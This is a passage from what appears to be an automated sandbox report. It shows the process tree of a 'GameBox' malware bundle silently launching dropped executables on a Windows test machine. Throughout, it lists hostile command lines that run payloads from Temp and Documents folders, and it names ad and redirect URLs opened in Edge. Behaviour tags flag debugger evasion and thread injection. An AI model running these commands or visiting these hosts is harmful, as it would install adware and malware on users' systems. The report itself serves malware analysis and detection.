                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:7068
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:5336
                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                tapinstall.exe remove tap0901
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:6128
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:6524
                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                    tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    PID:5012
                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:2272
                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:900
                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:1844
                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4592
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-UIJK6.tmp\MediaBurner2.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-UIJK6.tmp\MediaBurner2.tmp" /SL5="$10406,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:1044
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-AA37F.tmp\3377047_logo_media.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-AA37F.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:1716
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IRWQEQMGUT\ultramediaburner.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\IRWQEQMGUT\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:4672
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-BN7I1.tmp\ultramediaburner.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-BN7I1.tmp\ultramediaburner.tmp" /SL5="$405B0,281924,62464,C:\Users\Admin\AppData\Local\Temp\IRWQEQMGUT\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      PID:5788
                                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:4204
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\f4-a44a2-8ef-b43a0-9c94a458fa5fa\Xehelaecefi.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\f4-a44a2-8ef-b43a0-9c94a458fa5fa\Xehelaecefi.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:5492
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:2184
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:5836
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                              PID:5204
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1a4,0x1f0,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:2108
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:3804
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xd0,0x10c,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:5580
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:3140
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:1392
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:5108
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x88,0x10c,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:1448
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:2552
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:3152
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:4272
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:4152
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\c3-48969-b5f-ed5a2-d5f3cea78544d\Jomapaegeri.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\c3-48969-b5f-ed5a2-d5f3cea78544d\Jomapaegeri.exe"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:6508
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3etacxc2.n4a\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:6524
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3etacxc2.n4a\GcleanerEU.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3etacxc2.n4a\GcleanerEU.exe /eufive
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:5712
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 292
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:3748
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qqwprqz.f1d\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:3628
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3qqwprqz.f1d\installer.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3qqwprqz.f1d\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            PID:4600
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3qqwprqz.f1d\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3qqwprqz.f1d\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319901 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:8
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3bx5jipi.2tt\ufgaa.exe & exit
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:6400
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3e0ububi.qgv\anyname.exe & exit
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                PID:5512
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3e0ububi.qgv\anyname.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3e0ububi.qgv\anyname.exe
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:1544
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3e0ububi.qgv\anyname.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3e0ububi.qgv\anyname.exe" -q
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:5308
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 920
                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          PID:5880
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ijjisyji.s3b\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:5832
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ijjisyji.s3b\gcleaner.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ijjisyji.s3b\gcleaner.exe /mixfive
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:6240
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 296
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:2144
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vzbk4v2r.whr\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:5196
                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 1932
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:6884
                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:3208
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4259335.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4259335.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:828
                                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 828 -s 2356
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        PID:5860
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8054769.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8054769.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:4476
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3483072.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3483072.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                      PID:5648
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4992345.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4992345.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:4380
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8002564.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8002564.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 2444
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        PID:4292
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:3852
                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5548
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:5260
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\_80sinksnPTwNz2ccsH3vW2V.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\_80sinksnPTwNz2ccsH3vW2V.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        PID:3460
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\_80sinksnPTwNz2ccsH3vW2V.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\_80sinksnPTwNz2ccsH3vW2V.exe"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                          PID:5612
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\5Gp8eHIDFQjs6glfe4T03Ujv.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\5Gp8eHIDFQjs6glfe4T03Ujv.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:6156
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 316
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:6800
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\1wR9UMEwtvbYb8f6aLDTpgIL.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\1wR9UMEwtvbYb8f6aLDTpgIL.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:6208
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\1wR9UMEwtvbYb8f6aLDTpgIL.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\1wR9UMEwtvbYb8f6aLDTpgIL.exe" -q
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:4056
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\na5KqmD1pwBPE5G7H7zol0CL.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\na5KqmD1pwBPE5G7H7zol0CL.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6148
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\kgRTsI1L5qscPnCS4R7s19FV.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\kgRTsI1L5qscPnCS4R7s19FV.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:1036
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 272
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                    PID:5996
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\9GqVg6_xZ3mYoDOgZb3csl3a.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\9GqVg6_xZ3mYoDOgZb3csl3a.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:5400
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\sX2ktgo6yNIUMEizCUdtWacm.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\sX2ktgo6yNIUMEizCUdtWacm.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:1700
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\sX2ktgo6yNIUMEizCUdtWacm.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\sX2ktgo6yNIUMEizCUdtWacm.exe
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:6448
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\r0Rlosc3ZatsgTRUPn5BRfDB.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\r0Rlosc3ZatsgTRUPn5BRfDB.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Mpf3qzSeRnPRDXpW4NnRUhQ7.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Mpf3qzSeRnPRDXpW4NnRUhQ7.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                        PID:4928
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\YqSOqk1JysRBxZLyeWP44Sos.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\YqSOqk1JysRBxZLyeWP44Sos.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:1124
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3136792.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3136792.exe"
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:5632
                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 5632 -s 2192
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Program crash
